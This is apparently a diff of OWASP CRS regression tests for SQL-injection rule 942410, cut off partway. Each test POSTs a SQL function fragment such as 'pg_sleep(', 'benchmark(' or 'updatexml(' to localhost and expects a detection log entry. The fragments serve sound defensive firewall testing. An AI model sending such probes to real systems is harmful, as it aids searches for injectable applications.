text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=md5%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 
942410-64 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=md5%5C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-65 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=MID%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-66 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=minute+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-67 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=month%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-68 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "name_const(" - version: HTTP/1.0 - output: 
- log_contains: id "942410" - - test_title: 942410-69 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "now(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-70 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "nOW(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-71 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ord(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-72 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "password?(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-73 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "password/?(" - version: 
HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-74 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Password>$(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-75 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pg_sleep(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-76 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pi(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-77 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "PI(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-78 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pow(" 
- version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-79 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "POW(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-80 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "quarter. (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-81 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "rand(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-82 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Rand (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-83 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - 
data: "RAND(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-84 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "replace(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-85 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "REPLACE(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-86 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "round (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-87 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "round(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-88 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - 
uri: "/post" - data: "rtrim(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-89 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "RTRIM(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-90 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sin (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-91 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SIN(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-92 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sleep(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-93 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: 
POST - port: 80 - uri: "/post" - data: "SLEEP (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-94 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=strcmp(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-95 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=substr(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-96 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SUBSTR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-97 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=substring(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-98 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SUBSTRING(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-99 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sysdate(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-100 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "time (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-101 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=time%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-102 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=trim%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-103 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - 
User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=Uncompress+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-104 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=unhex%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-105 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=uNhEx%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-106 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=updatexml%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-107 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=UpdateXML%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-108 - desc: "SQL Injection Attack" - stages: - - stage: - 
input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=UPPER%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-109 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=user+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-110 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=user%2F%3F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-111 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=user%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-112 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=values+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-113 - 
desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=VALUES%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-114 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=version%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-115 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=version%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-116 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xmltype%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-117 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=XMLType%28" - version: HTTP/1.0 - output: 
- log_contains: id "942410" - - test_title: 942410-118 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=year%5D%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" + - test_id: 1 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "ABS(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 2 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "benchmark(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 3 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "BENChmARk(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 4 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "cast(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 5 + desc: 
"SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "CAST(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 6 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "char(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 7 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "chaR(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 8 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "chr(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 9 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "CHR(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 10 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost 
+ User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "COALESCE(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 11 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Compress (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 12 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "concat (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 13 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "cOnCaT(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 14 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "concat_ws(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 15 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "convert(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 16 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "cOnVeRt(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 17 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "COS(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 18 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "COUNT(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 19 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "CURRENT_USER(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 20 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
